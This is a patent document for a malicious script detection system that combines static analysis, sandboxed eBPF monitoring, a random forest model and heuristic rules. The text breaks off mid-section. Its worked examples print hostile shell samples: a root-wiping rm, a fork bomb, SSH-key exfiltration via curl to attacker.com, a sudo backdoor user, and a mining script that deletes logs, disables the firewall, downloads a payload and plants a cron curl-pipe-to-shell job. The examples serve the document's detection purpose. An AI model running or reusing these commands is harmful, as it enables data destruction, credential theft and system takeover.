
CN119397533A - Malicious script detection method, device, equipment and storage medium - Google Patents

Malicious script detection method, device, equipment and storage medium

Info

Publication number
CN119397533A
CN119397533A (application CN202411486314.7A)
Authority
CN
China
Prior art keywords
malicious
script
risk assessment
behavior
result
Prior art date
Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
Pending
Application number
CN202411486314.7A
Other languages
Chinese (zh)
Inventor
翁迟迟
Current Assignee (The listed assignees may be inaccurate. Google has not performed a legal analysis and makes no representation or warranty as to the accuracy of the list.)
Beijing QIYI Century Science and Technology Co Ltd
Original Assignee
Beijing QIYI Century Science and Technology Co Ltd
Priority date (The priority date is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the date listed.)
Filing date
Publication date
Application filed by Beijing QIYI Century Science and Technology Co Ltd filed Critical Beijing QIYI Century Science and Technology Co Ltd
Priority to CN202411486314.7A priority Critical patent/CN119397533A/en
Publication of CN119397533A publication Critical patent/CN119397533A/en
Pending legal-status Critical Current


Classifications

    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/562Static detection
    • G06F21/563Static detection by source code analysis
    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F18/00Pattern recognition
    • G06F18/20Analysing
    • G06F18/22Matching criteria, e.g. proximity measures
    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F21/00Security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F21/50Monitoring users, programs or devices to maintain the integrity of platforms, e.g. of processors, firmware or operating systems
    • G06F21/55Detecting local intrusion or implementing counter-measures
    • G06F21/56Computer malware detection or handling, e.g. anti-virus arrangements
    • G06F21/566Dynamic detection, i.e. detection performed at run-time, e.g. emulation, suspicious activities
    • GPHYSICS
    • G06COMPUTING OR CALCULATING; COUNTING
    • G06FELECTRIC DIGITAL DATA PROCESSING
    • G06F2221/00Indexing scheme relating to security arrangements for protecting computers, components thereof, programs or data against unauthorised activity
    • G06F2221/03Indexing scheme relating to G06F21/50, monitoring users, programs or devices to maintain the integrity of platforms
    • G06F2221/033Test or assess software

Landscapes

  • Engineering & Computer Science (AREA)
  • Computer Security & Cryptography (AREA)
  • Theoretical Computer Science (AREA)
  • General Engineering & Computer Science (AREA)
  • Software Systems (AREA)
  • Computer Hardware Design (AREA)
  • Physics & Mathematics (AREA)
  • General Physics & Mathematics (AREA)
  • Health & Medical Sciences (AREA)
  • Virology (AREA)
  • General Health & Medical Sciences (AREA)
  • Data Mining & Analysis (AREA)
  • Evolutionary Computation (AREA)
  • Life Sciences & Earth Sciences (AREA)
  • Artificial Intelligence (AREA)
  • Bioinformatics & Cheminformatics (AREA)
  • Evolutionary Biology (AREA)
  • Computer Vision & Pattern Recognition (AREA)
  • Bioinformatics & Computational Biology (AREA)
  • Storage Device Security (AREA)

Abstract


The present application relates to a method, device, equipment and storage medium for detecting malicious scripts. The solution not only generates a static analysis result by analyzing the script text, but also generates a dynamic analysis result from the operation events of the target script at runtime, and determines a comprehensive risk assessment result through a machine learning model and a heuristic rule set. In this way, malicious behavior executed by the target script at runtime can be discovered, so the solution can effectively detect novel malicious scripts; moreover, by running the target script in a sandbox container, the solution improves the efficiency of malicious script detection.

Description

Malicious script detection method, device, equipment and storage medium
Technical Field
The present application relates to the field of malicious script detection, and in particular, to a method, an apparatus, a device, and a storage medium for detecting a malicious script.
Background
With the development of the internet, network security has become one of the most critical problems in the internet era, and malicious scripts have become a main means of network attack in recent years. The malicious script is a script for performing unauthorized operations or destroying a system, and the conventional malicious script detection technology often depends on a known malicious script feature library, so that the unknown or modified malicious script is difficult to effectively detect. Moreover, with the continuous development of hacking technology, malicious script forms are more and more diversified, and the traditional detection means are difficult to deal with, so that the phenomenon of missing report often occurs.
Therefore, how to accurately detect the malicious script is a problem that needs to be solved by those skilled in the art.
Disclosure of Invention
The application provides a method, a device, equipment and a storage medium for detecting a malicious script, which are used for accurately detecting the malicious script.
In a first aspect, the present application provides a method for detecting a malicious script, including:
Acquiring a target script to be analyzed;
performing text analysis on the target script to generate a static analysis result;
operating the target script through a sandbox container, acquiring an operation event of the target script in the operation process, and generating a dynamic analysis result according to the operation event;
Extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk assessment result;
Matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
and determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
In a second aspect, the present application provides a detection apparatus for malicious scripts, including:
The first acquisition module is used for acquiring a target script to be analyzed;
the first analysis module is used for carrying out text analysis on the target script and generating a static analysis result;
The second acquisition module is used for operating the target script through the sandbox container and acquiring an operation event of the target script in the operation process;
the second analysis module is used for generating a dynamic analysis result according to the operation event;
the first evaluation module is used for extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting a machine learning model to obtain a first risk evaluation result;
the second evaluation module is used for matching the operation behaviors in the dynamic analysis results through a heuristic rule set to determine a second risk evaluation result;
and the result determining module is used for determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
In a third aspect, the present application provides an electronic device, comprising:
The electronic device comprises a processor, a memory, and a computer program stored in the memory and executable on the processor, wherein the processor performs the steps of the above malicious script detection method by executing the computer program.
In a fourth aspect, the present application provides a computer storage medium storing computer-executable instructions for performing the steps of the above-described malicious script detection method.
Compared with the prior art, the technical solution provided by the embodiments of the present application has the following advantages: a malicious script detection scheme is provided that can generate a static analysis result by analyzing the script text, generate a dynamic analysis result from the operation events of the target script at runtime, and determine a comprehensive risk assessment result through a machine learning model and a heuristic rule set. In this way, malicious behavior executed by the target script at runtime can be discovered, so novel malicious scripts can be effectively detected, and running the target script in a sandbox container improves the efficiency of malicious script detection.
Drawings
The accompanying drawings, which are incorporated in and constitute a part of this specification, illustrate embodiments consistent with the invention and together with the description, serve to explain the principles of the invention.
In order to more clearly illustrate the embodiments of the invention or the technical solutions of the prior art, the drawings which are used in the description of the embodiments or the prior art will be briefly described, and it will be obvious to a person skilled in the art that other drawings can be obtained from these drawings without inventive effort.
One or more embodiments are illustrated by way of example and not limitation in the figures of the accompanying drawings, in which like references indicate similar elements, and in which the figures of the drawings are not to be taken in a limiting sense, unless otherwise indicated.
FIG. 1 is a flow chart of a method for detecting a malicious script according to an embodiment of the present application;
FIG. 2 is a flowchart of another method for detecting a malicious script according to an embodiment of the present application;
FIG. 3 is a flowchart illustrating another method for detecting a malicious script according to an embodiment of the present application;
fig. 4 is a schematic structural diagram of a detection device for malicious scripts according to an embodiment of the present application;
Fig. 5 is a schematic structural diagram of an electronic device according to an embodiment of the present application.
Detailed Description
A malicious script is any script added to, altered in, or removed from a software system for the purpose of causing harm or impairing system functions. The following common malicious scripts are used here as examples.
Script one:
Bash
#!/bin/bash
rm -rf /
when the script is executed, all files and directories under the root directory are deleted recursively, so that the system cannot operate, and the risk is extremely high.
Script II:
Bash
:(){ :|:& };:
The second script is a Fork bomb, which is an attack method for exhausting system resources by using recursive call. When the script is executed, the number of system processes is increased rapidly until all system resources are exhausted, so that the system crashes and the risk is high.
Script III:
Bash
#!/bin/bash
tar -czf /tmp/ssh_keys.tar.gz ~/.ssh
curl -F 'file=@/tmp/ssh_keys.tar.gz' http://attacker.com/upload
The third script steals the user's SSH (Secure Shell) key and sends it to the attacker's server. When the script is executed, the user's SSH key is leaked, allowing the attacker to take control of the user's account; the risk is high.
Script IV:
Bash
#!/bin/bash
useradd -m backdoor -s /bin/bash
echo 'backdoor:password' | chpasswd
usermod -aG sudo backdoor
The fourth script adds a backdoor user to the system and grants it sudo (superuser do, allowing an ordinary user to execute administrator commands) privileges. After the script is executed, an attacker can obtain full control of the system through the backdoor user; the risk is high.
It should be noted that traditional malicious script detection relies on libraries of known malicious script signatures and therefore cannot effectively detect novel malicious scripts. With the continuous development of hacking techniques, malicious scripts are becoming smaller, spreading faster, and appearing in ever more varieties, which traditional security protection measures struggle to handle in time, leading to missed detections.
Therefore, the present embodiment provides a method, an apparatus, a device, and a storage medium for detecting a malicious script, so as to accurately detect the malicious script.
For the purpose of making the objects, technical solutions and advantages of the embodiments of the present application more apparent, the technical solutions of the embodiments of the present application will be clearly and completely described below with reference to the accompanying drawings in the embodiments of the present application, and it is apparent that the described embodiments are some embodiments of the present application, but not all embodiments of the present application. All other embodiments, which can be made by those skilled in the art based on the embodiments of the application without making any inventive effort, are intended to be within the scope of the application.
The following disclosure provides many different embodiments, or examples, for implementing different structures of the invention. In order to simplify the present disclosure, components and arrangements of specific examples are described below. They are, of course, merely examples and are not intended to limit the invention. Furthermore, the present invention may repeat reference numerals and/or letters in the various examples. This repetition is for the purpose of simplicity and clarity and does not in itself dictate a relationship between the various embodiments and/or configurations discussed.
Referring to fig. 1, fig. 1 is a schematic flow chart of a method for detecting a malicious script according to an embodiment of the present application, where the method includes the following steps:
S101, acquiring a target script to be analyzed;
Before executing the method, a malicious script analysis engine is first deployed on a cloud platform and a cloud-native cluster environment is configured. This specifically includes configuring the cluster environment, deploying microservice components, preparing the sandbox container, and deploying the event acquisition program. When configuring the cluster environment, a distributed cluster may be set up with Kubernetes and deployment parameters specified, including the number of nodes, the resource configuration of each node, and the network configuration; for example, the minimum number of nodes is set to 3, each node is configured with 8 CPU (Central Processing Unit) cores and 16 GB of RAM (Random Access Memory), and the network is a 10 Gbps internal network. The microservice components deployed in this embodiment execute the malicious script detection method and include a task scheduling service, a load balancing service, a sandbox execution service, a behavior monitoring service, a result analysis service, a result aggregation service, and the like; the services may communicate via the gRPC (Google Remote Procedure Call) protocol to ensure low latency and high throughput.
When preparing the sandbox container, the container must first be created; for example, a lightweight Linux distribution (such as Alpine Linux) may be used to create and configure it. In this embodiment the container configuration specifically includes a CPU limit of 2 cores, a memory limit of 4 GB, 10 GB of disk space, NAT (Network Address Translation) network mode, and an egress traffic limit of 5 Mbps. Next, environment simulation is needed, including randomly generating system information, simulating common system services, and planting bait files (honeypot technique), where the system information includes the hostname and IP (Internet Protocol) address, the system services include the ssh (Secure Shell) service and the cron service, and the bait files include fake system logs and fake user data.
Finally, the script execution process is configured, including specifying the interpreter that runs the script and the execution parameters. The interpreter may be bash (Bourne Again SHell, a command-line interpreter) or python, and the execution parameters include the timeout and the resource limit parameters. In this embodiment, the timeout may be set according to the script's priority and defaults to 5 minutes, with CPU usage capped at 80% and memory capped at 3 GB.
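As an illustration only (the embodiment does not prescribe a particular container API), the following Python sketch shows one way the sandbox limits described above might be applied using the Docker SDK for Python; the image name, mount path, helper name, and cleanup policy are assumptions.
Python
import docker

def run_in_sandbox(script_path, timeout_s=300):
    # Launch the target script in a constrained container (a sketch only;
    # disk quota and egress shaping would be configured separately).
    client = docker.from_env()
    container = client.containers.run(
        "alpine:3.19",                                    # lightweight Linux distribution
        command=["/bin/sh", "/work/target.sh"],
        volumes={script_path: {"bind": "/work/target.sh", "mode": "ro"}},
        detach=True,
        mem_limit="4g",                                   # memory limit of 4 GB
        nano_cpus=2_000_000_000,                          # CPU limit of 2 cores
        network_mode="bridge",                            # NAT-style networking
        pids_limit=256,                                   # guards against fork bombs
    )
    try:
        result = container.wait(timeout=timeout_s)        # default timeout: 5 minutes
        return result.get("StatusCode", -1)
    finally:
        container.remove(force=True)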
In this embodiment, when running the target script, the sandbox container obtains operation events through the event acquisition program, and the eBPF (extended Berkeley Packet Filter, a kernel programming technique) mechanism may be used to obtain the operation events. The scheme compiles and loads a custom eBPF program into the sandbox container kernel and sets monitoring points for acquiring operation events. In this embodiment the monitoring points cover system call events, such as open (open a file), read (read data), write (write data), connect, and execve (execute a program); file operation events, such as creating, modifying, and deleting files; network activity events, such as TCP (Transmission Control Protocol)/UDP (User Datagram Protocol) connections and data transmission; and process management events, such as fork (create a process), clone (create a process), and exit (terminate a process). The application may also configure an event filter to reduce the collection of irrelevant data.
Specifically, when a user submits an analysis task, a request to be analyzed can be submitted through an API (Application Programming Interface) or an interface. After receiving the analysis request through the API, the system obtains the parameters carried by the request, including the script file, the analysis priority, and the timeout, where the script to be analyzed is called the target script. The priority may be high, medium, or low; the analysis priority determines the analysis order of the target scripts, and the higher the priority, the earlier the script is analyzed.
After the target scripts are obtained, this embodiment also generates a unique task ID for each target script, which may be in UUID (Universally Unique Identifier) format, and records task metadata including the submission time, the hash of the target script file, and the file type identification, where the file hash may be computed with the SHA256 algorithm and the file type may be identified with the libmagic library. When tasks are distributed, they are assigned to nodes by Weighted Round Robin to keep the nodes load-balanced, where the factors affecting the weights include each node's current CPU load, available memory, and recent task completion rate; the higher the recent task completion rate, the higher the weight.
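A minimal sketch of this task-intake step follows; the node-weight formula and the field names (cpu_load, free_mem_ratio, recent_completion_rate) are illustrative assumptions rather than the patented weighting scheme.
Python
import hashlib
import time
import uuid

def build_task(script_path, priority="medium"):
    # Record the task metadata described above: UUID task ID, submission
    # time, SHA256 file hash, and priority (high / medium / low).
    with open(script_path, "rb") as f:
        file_hash = hashlib.sha256(f.read()).hexdigest()
    return {
        "task_id": str(uuid.uuid4()),
        "submitted_at": time.time(),
        "script_hash": file_hash,
        "priority": priority,
    }

def pick_node(nodes):
    # Weighted selection: lower CPU load, more free memory, and a higher
    # recent completion rate all raise a node's weight (assumed formula).
    def weight(n):
        return (1.0 - n["cpu_load"]) + n["free_mem_ratio"] + n["recent_completion_rate"]
    return max(nodes, key=weight)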
S102, performing text analysis on the target script to generate a static analysis result;
In this embodiment, the script code may be JavaScript, VBScript (Visual Basic Script), or another scripting language. Before static analysis is performed on the target script, initial preprocessing is required to remove comments from and format the input code of the target script, where removing comments means deleting comment lines from the code, and formatting the code means removing unnecessary spaces and line breaks and standardizing the code format to facilitate subsequent analysis.
After the preprocessed script codes are obtained, static analysis can be performed on the text. The purpose of the static analysis is to extract potentially dangerous features in the target script, which may include at least one of obfuscated code segments, encrypted code segments, commands, functions, strings, and constants, and is not specifically limited herein. In identifying potentially dangerous features, the potentially dangerous features may be identified by a preset database, regular expression, etc., which are not particularly limited herein.
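A minimal sketch of the preprocessing and feature-identification steps above, assuming shell-style comments and a small regular-expression rule set; the patterns below are illustrative examples of "potentially dangerous features", not the embodiment's actual database.
Python
import re

# Illustrative patterns; the real rule base and thresholds are assumptions.
DANGEROUS_PATTERNS = {
    "destructive_delete": re.compile(r"\brm\s+-rf\s+/"),
    "firewall_disable":   re.compile(r"\b(ufw\s+disable|iptables\s+-F)\b"),
    "eval_call":          re.compile(r"\beval\s*\("),
    "base64_blob":        re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
}

def preprocess(code):
    # Remove comment lines and collapse redundant whitespace.
    lines = [ln for ln in code.splitlines() if not ln.lstrip().startswith("#")]
    return "\n".join(" ".join(ln.split()) for ln in lines if ln.strip())

def static_scan(code):
    # Return every potentially dangerous feature found in the cleaned code.
    cleaned = preprocess(code)
    findings = []
    for name, pattern in DANGEROUS_PATTERNS.items():
        for m in pattern.finditer(cleaned):
            findings.append({"feature": name, "match": m.group(0), "pos": m.start()})
    return findings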
S103, running a target script through the sandbox container, acquiring an operation event of the target script in the running process, and generating a dynamic analysis result according to the operation event;
In this embodiment, the sandbox container is specifically a Docker (open-source application container engine) container. Using a Docker container enables fast startup and low resource usage, so a large number of concurrent script analysis requests can be handled effectively, and the sandbox is lighter and more efficient than a traditional virtual machine sandbox. In addition, while the target script runs in the sandbox container, all of its operation events can be comprehensively monitored through the eBPF mechanism, where eBPF allows user-defined code to be executed safely and efficiently in the Linux kernel. By attaching eBPF programs to specific kernel hooks, events in the system, such as system call events, network activity events, file operation events, and process management events, can be captured and processed in real time. This provides a lightweight, high-performance event capture mechanism for sandbox analysis and ensures that malicious behavior is not missed.
It should be noted that dynamic analysis in this embodiment identifies dangerous behavior from the operation events of the target script at runtime. Therefore, after the operation events of the target script are obtained, whether malicious operation behaviors exist in the operation events can be preliminarily analyzed. For example, if a log deletion event and a firewall disabling attempt event are identified among the operation events, the target script attempted to perform these two malicious operations, deleting logs and disabling the firewall, while running; the relevant information about the malicious operation behaviors is recorded to generate the dynamic analysis result.
S104, extracting feature vectors from the static analysis result and the dynamic analysis result, and inputting the feature vectors into a machine learning model to obtain a first risk assessment result;
In this embodiment, the machine learning model is used for preliminary classification of the extracted feature vectors. The machine learning model can be specifically a random forest model, wherein the random forest is an integrated learning method, and classification tasks are realized by constructing a plurality of decision trees. This has the advantage of robustness to noisy data and processing power for high dimensional data. Before using the random forest model, the random forest model needs to be trained using a large amount of annotation data, wherein the annotation data contains the behavior features of normal and malicious scripts.
Specifically, this embodiment extracts feature vectors from the static analysis result and the dynamic analysis result. Features extracted from the static analysis result include command calls and string constants, and features extracted from the dynamic analysis result include the system call sequence, file operation frequency, number of network connections, process creation pattern, and so on. The scheme may also set the weight and dimensionality of each feature type; for example, if the feature vector of each sample is 500-dimensional, the extracted command call features may occupy 100 dimensions and the system call sequence 200 dimensions. After the feature vector is obtained, it is normalized so that all features fall within the same scale range, such as 0-1; the normalization method may be Min-Max normalization, Z-score normalization, and the like. The normalized feature vector can then be input into the random forest model, which feeds it to each tree and aggregates the predictions of all trees to produce the first risk assessment result.
The first risk assessment result may include the malicious probability score or malicious level output by the random forest model and a preliminary classification result determined from the malicious probability. The malicious probability score may lie between 0 and 1; for example, if the feature vector of the target script is input into the model and the malicious probability score output is 0.75, there is a 75% probability that the behavior is malicious. The application may also set a classification threshold for a preliminary judgment of whether the script is malicious; if the classification threshold is set to 0.7, the script is considered malicious when the probability score is greater than 0.7, and non-malicious otherwise.
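A sketch of the first risk assessment under stated assumptions: Min-Max normalization, an sklearn RandomForestClassifier with illustrative hyperparameters, class 1 taken to mean "malicious", and the 0.7 classification threshold mentioned above.
Python
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import MinMaxScaler

def train_first_stage(train_vectors, train_labels):
    # Train the scaler and the random forest on labelled feature vectors
    # (labels: 0 = normal script, 1 = malicious script).
    scaler = MinMaxScaler().fit(train_vectors)
    model = RandomForestClassifier(n_estimators=100, random_state=0)
    model.fit(scaler.transform(train_vectors), train_labels)
    return model, scaler

def first_risk_assessment(feature_vector, model, scaler, threshold=0.7):
    # Normalize the 500-dimensional static + dynamic feature vector and
    # score it; predict_proba column 1 is the malicious probability.
    x = scaler.transform(np.asarray(feature_vector, dtype=float).reshape(1, -1))
    p = float(model.predict_proba(x)[0, 1])
    return {"malicious_probability": p, "is_malicious": p > threshold}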
S105, matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
In this embodiment, the dynamic analysis result includes primarily identified operation behaviors, and the heuristic rule set is set with rules for identifying malicious operation behaviors, so in this embodiment, the malicious operation behaviors can be identified by further evaluating the target script in operation through the heuristic rule set and the rules in the heuristic rule set. After the malicious operation behaviors are identified, the risk assessment result can be determined according to the number of the malicious operation behaviors, the importance degree of the malicious operation behaviors and other factors, and the risk assessment result can be a matching score or a risk grade, and is not particularly limited, so long as the risk degree can be reflected.
For example, the rules in the heuristic rule set may include "delete system log, score = 0.8" and "disable security software, score = 0.7". If the target script is detected performing both malicious operations, deleting the system log and disabling the security software, the risk assessment result is 0.8 + 0.7 = 1.5.
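A minimal sketch of this rule matching; the behaviour labels are hypothetical identifiers, and the two weights simply mirror the example above.
Python
# Illustrative high-risk rules; the embodiment's actual rule base may differ.
HIGH_RISK_RULES = {
    "delete_system_log": 0.8,
    "disable_security_software": 0.7,
}

def second_risk_assessment(observed_behaviors):
    # Sum the weight scores of every high-risk rule the script matched.
    return sum(score for rule, score in HIGH_RISK_RULES.items()
               if rule in observed_behaviors)

# Example: a script that deletes the system log and disables the security
# software scores 0.8 + 0.7 = 1.5.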
S106, determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
In this embodiment, the comprehensive risk assessment result is determined by combining the first risk assessment result of the machine learning model and the second risk assessment result of rule matching, so as to more accurately assess the overall risk. The setting of different weights may balance the effect of both on the final score.
Specifically, when determining the comprehensive risk assessment result from the first and second risk assessment results, the way the comprehensive result is determined can depend on the types of the two results. If the first risk assessment result is a malicious level and the second is a danger level, the comprehensive risk assessment result is determined from the two levels; for example, if the first result is a high malicious level and the second is a high danger level, the comprehensive assessment is that the target script is high risk. Similarly, if the first risk assessment result is a malicious probability score and the second is a matching score, the comprehensive risk assessment result is the total score obtained by weighting the malicious probability score and the matching score, that is, the comprehensive risk score.
In summary, it can be seen that when the malicious script is detected, the scheme can generate a static analysis result through analysis of the script text, generate a dynamic analysis result according to an operation event of the target script in the running process, and determine a comprehensive risk assessment result through a machine learning model and a heuristic rule set. By the method, malicious behaviors executed by the target script in the running process can be found, so that the novel malicious script can be effectively detected, and the detection efficiency of the malicious script can be improved by running the target script through the sandbox container.
Based on the above embodiment, the process of generating the static analysis result by text analysis of the target script specifically includes: performing text analysis on the target script, identifying the target code segments in the target script, and recording the code information and position of each target code segment, where the types of target code segments include at least one of obfuscated code segments, encrypted code segments, commands, functions, character strings, and constants.
Specifically, a target code segment is a code segment used to analyze potential threats; its types include obfuscated code segments, encrypted code segments, commands, functions, character strings, and constants, and the code information includes information related to the target code segment such as its type, an obfuscation type tag, an encryption type tag, and potentially dangerous calls.
This is illustrated by the following steps:
1. Identifying potentially obfuscated or encrypted code segments:
After the preprocessed script code of the target script is obtained, the potential features in the script need to be extracted. In this embodiment these specifically include string features, control flow features, and variable features, where string features are features such as long strings, base64 encoding, and hexadecimal encoding in the script code; control flow features are complex control flow structures in the script code, such as heavy if-else nesting and loops; and variable features are large numbers of unused variables or suspected obfuscated variable names (randomly generated variable names). This embodiment may identify the long-string threshold through string_threshold and the control flow complexity threshold through complexity_threshold, which are not specifically limited here. By extracting the above features, a set of feature vectors can be generated to identify code segments that may be obfuscated or encrypted.
Secondly, this embodiment can analyze the feature vectors and the script code against a predefined known pattern library and regular expressions to identify possible obfuscation patterns or encryption patterns. In this embodiment, the known pattern library (pattern_library) contains patterns of common obfuscation techniques (such as character substitution, string concatenation, and eval function calls). The regular expressions (regex_patterns) are a collection of expressions used to match common obfuscation approaches, primarily targeting string features, and can be used to match known encryption or obfuscation patterns. After matching, the matched pattern information can be generated, including the positions of the matched code segments and the corresponding obfuscation type tags and encryption type tags.
Further, after the matched code segments and their type tags are obtained, possible encrypted segments can be further identified through string decoding, decryption function identification, and dynamic feature simulation. String decoding decodes matched base64- or hex-encoded strings and checks whether the decoded string exhibits code features (for example, executable code); decryption function identification uses pattern matching to recognize common decryption function calls (such as AES decryption) and tracks their input parameters; and dynamic feature simulation partially simulates the execution of suspicious passages to judge whether new code fragments are generated during decryption. This embodiment may set the maximum number of decoding attempts through decoder_attempts and the common decryption function patterns through decryption_patterns. After an encrypted code segment is identified in this way, the encryption type tag can be output and its position recorded.
Finally, through the above steps, the obfuscated code segments and encrypted code segments of the target script, together with the type tag and position of each code segment, are identified, and a final analysis report is generated; the content of the analysis report forms part of the static analysis result. In this embodiment, the output format of the tags may be specified by output_format, which may be JSON (JavaScript Object Notation) or XML (Extensible Markup Language). In the analysis report, the classification tags may be output in JSON or XML format to identify the features, obfuscation type, and encryption type of each code segment, and the position of each suspicious code segment, such as the line number and character range, is recorded precisely.
For example, if the target script is a JavaScript script including a base64 code, the script code is as follows:
JavaScript
var encodedString=
"ZnVuY3Rpb24gdGVzdCgpe2FsZXJ0KCJIZWxsbyBXb3JsZCEiKTt9";
eval(atob(encodedString));
The scheme performs the following steps when identifying potentially obfuscated or encrypted code segments:
1.1. Remove the comments in the code and format it to obtain clean code.
1.2. Extract features, identifying the base64-encoded string and the eval call.
1.3. Match the base64 encoding pattern using regular expressions.
1.4. Decode the base64 string and identify that it contains function call features.
1.5. Output the type tags, marking the eval call and the encrypted segment, and output the following result:
JSON
{
"code_segment":"eval(atob(encodedString));",
"tag":"Potentially Encrypted Code",
"position":"Line 2,Characters 1-32"
}
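A sketch only of the decoding check used in steps 1.3-1.4 above; the maximum attempt count and the code-feature heuristics are assumptions.
Python
import base64
import binascii
import re

# Heuristic "code features" for decoded text; these patterns are assumptions.
CODE_FEATURES = re.compile(r"(function\s*\(|eval\s*\(|alert\s*\(|#!/bin/|\bexec\b)")

def try_decode(candidate, max_attempts=3):
    # Attempt up to max_attempts rounds of base64 decoding (handling nested
    # encodings) and return the decoded text if it looks like executable code.
    data = candidate
    for _ in range(max_attempts):
        try:
            decoded = base64.b64decode(data, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            return None
        if CODE_FEATURES.search(decoded):
            return decoded
        data = decoded
    return None

# For the example above, try_decode("ZnVuY3Rpb24gdGVzdCgpe2FsZXJ0KCJIZWxsbyBXb3JsZCEiKTt9")
# returns 'function test(){alert("Hello World!");}', which matches the alert(...)
# call feature and is therefore tagged as potentially encrypted code.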
2. Identifying commands and functions:
In this embodiment, which commands are legal and which may be dangerous can be determined by scanning the commands and function calls in the script and comparing them against a database of known commands/functions. Commands such as rm -rf, ufw disable, and userdel may be indicators of malicious script behavior; after the comparison, the commands and functions used in the target script can be output, and potentially dangerous calls, such as system commands and network operation functions, are flagged.
For example, if the target script is a mining script:
Bash
#!/bin/bash
rm -rf /var/log/syslog    # purge log
ufw disable    # shut down firewall
userdel vfinder    # uninstall EDR
/usr/local/qcloud/YunJing/uninst.sh    # uninstall EDR
wget -O /salt-store http://416419.selcdn.ru/cdn/salt_storer    # download binary
echo "***** $LDR http://217.8.117.37/c.sh|sh > /dev/null 2>&1"    # implant timed task
cat "$SSH_KEY_FILE" >> ~/.ssh/authorized_keys
After scanning the mining script, the following dangerous commands are found in the script:
rm -rf /var/log/syslog: clears the system log in an attempt to hide its activity.
ufw disable: shuts down the firewall, exposing the system.
userdel and /usr/local/qcloud/YunJing/uninst.sh: uninstall possible security software.
wget: downloads malicious software.
crontab: implants a timed task.
3. Identifying strings and constants
In this embodiment, the character strings and constants in the script need to be extracted and subjected to pattern matching and feature extraction against a string matching rule base, identifying sensitive strings and constant information in the target script, such as hard-coded paths, IP addresses, and URLs.
In the mining script, the following contents are extracted:
URL: http://416419.selcdn.ru/cdn/salt_storer, which may be a remote server used to download a malicious binary file.
IP address: http://217.8.117.37/c.sh, used for the periodically executed remote script.
SSH key file path: ~/.ssh/authorized_keys, which may be used for privilege escalation.
The method and device can thus identify obfuscated or encrypted code segments through static analysis, using the textual features of the code for pattern matching and decoding attempts without actually executing the code, which keeps the analysis process safe. Feature extraction and pattern matching quickly identify common obfuscation techniques, while string decoding and decryption function identification allow deeper analysis of potentially encrypted segments, ensuring high accuracy. Furthermore, by extracting commands, functions, character strings, and constants, potentially dangerous commands in the target script, as well as strings and constants used to perform dangerous operations, can be identified.
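A minimal sketch of the string and constant extraction in step 3, assuming a small regular-expression rule base; the rule names and expressions are illustrative, not the embodiment's actual rule base.
Python
import re

STRING_RULES = {
    "url":        re.compile(r"https?://[^\s\"']+"),
    "ip_address": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "ssh_path":   re.compile(r"[~\w./-]*\.ssh/[\w.-]+"),
}

def extract_strings_and_constants(script_text):
    # Return every URL, IP address, and SSH-related path found in the script,
    # e.g. the download URL and authorized_keys path in the mining script above.
    return {name: pattern.findall(script_text)
            for name, pattern in STRING_RULES.items()}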
Referring to fig. 2, fig. 2 is a flowchart of another method for detecting a malicious script according to an embodiment of the present application, where the method includes the following steps:
s201, acquiring a target script to be analyzed;
s202, performing text analysis on a target script to generate a static analysis result;
S203, running a target script through a sandbox container, and acquiring an operation event of the target script in the running process through a eBPF mechanism of the sandbox container, wherein the operation event comprises a system call event, a network activity event, a file operation event and a process management event;
s204, identifying malicious operation behaviors in the operation event;
S205, matching the operation event sequence in the sliding window with a malicious behavior pattern, and searching a first malicious operation behavior sequence with similarity exceeding a preset threshold;
s206, searching a second malicious operation behavior sequence meeting a malicious time sequence mode according to the time interval of each operation event;
S207, extracting feature vectors from a static analysis result and a dynamic analysis result, and inputting a machine learning model to obtain a first risk assessment result, wherein the dynamic analysis result comprises a malicious operation behavior, a first malicious operation behavior sequence and a second malicious operation behavior sequence;
S208, matching operation behaviors in the dynamic analysis result through a heuristic rule set, and determining a second risk assessment result;
S209, determining a comprehensive risk assessment result according to the first risk assessment result and the second risk assessment result.
Specifically, during the execution of the target script within the container, the operational events are obtained using the eBPF Trace mechanism. The operation events acquired in this embodiment include a system call event, a network activity event, a file operation event, and a process management event, which are described herein separately:
1.1, acquiring a system call event:
Before acquiring system call events, eBPF programs need to be attached to the system call tracing points, such as __x64_sys_execve; when the BPF program captures a system call related to the script, event processing is triggered and information such as the script path, execution parameters, and process ID is recorded. Specifically, during the execution of the target script, a system call monitoring tool records all system calls made during script execution and generates a system call log, which includes each system call event and its execution order, parameters, call results, and the like.
1.2, Acquiring network activity events:
In this embodiment, an eBPF program is required to capture network socket operations and generate network activity events, recording the external IP address, port number, hash of the transmitted data content, and so on, where the network socket operations include tcp_connect, tcp_sendmsg, and the like. The traffic analysis tool may be Wireshark, and the condition for generating a network activity event may be set as: the network request connects to an external address or involves a known mining pool IP.
1.3, Acquiring file operation events:
